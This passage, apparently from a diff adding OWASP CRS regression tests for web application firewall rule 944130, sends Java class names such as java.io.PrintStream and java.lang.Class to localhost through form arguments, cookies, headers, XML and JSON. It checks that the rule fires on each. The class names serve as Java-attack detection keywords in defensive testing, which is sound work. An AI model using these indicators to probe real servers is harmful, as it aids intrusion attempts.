"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-215 + desc: "XML attribute value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-216 + desc: "XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-217 + desc: "Nested XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-218 + desc: "Content-Type text/plain includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-219 + desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" 
+ data: "{\"test\": \"java.io.PipedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-220 + desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-221 + desc: "Argument test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-222 + desc: "Argument name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-223 + desc: "Cookie test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-224 + desc: "Cookie name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-225 + desc: "Request header test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-226 + desc: "XML attribute value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-227 + desc: "XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-228 + desc: "Nested XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-229 + desc: "Content-Type text/plain includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-230 + desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-231 + desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-232 + desc: "Argument test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-233 + desc: "Argument name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-234 + desc: "Cookie test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-235 + desc: "Cookie name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-236 + desc: "Request header test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: 
"id \"944130\"" + - test_title: 944130-237 + desc: "XML attribute value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-238 + desc: "XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-239 + desc: "Nested XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-240 + desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-241 + desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-242 + desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-243 + desc: "Argument test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-244 + desc: "Argument name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-245 + desc: "Cookie test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-246 + desc: "Cookie name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-247 + desc: "Request header test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: 
+ Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-248 + desc: "XML attribute value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-249 + desc: "XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-250 + desc: "Nested XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-251 + desc: "Content-Type text/plain includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-252 + desc: "Content-Type application/json arg value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-253 + desc: "Content-Type application/json arg name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-254 + desc: "Argument test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-255 + desc: "Argument name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-256 + desc: "Cookie test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-257 + desc: "Cookie name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
java.io.StringReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-258 + desc: "Request header test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-259 + desc: "XML attribute value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-260 + desc: "XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-261 + desc: "Nested XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-262 + desc: "Content-Type text/plain includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-263 + desc: "Content-Type application/json arg value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-264 + desc: "Content-Type application/json arg name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-265 + desc: "Argument test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-266 + desc: "Argument name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-267 + desc: "Cookie test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-268 + desc: "Cookie name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + 
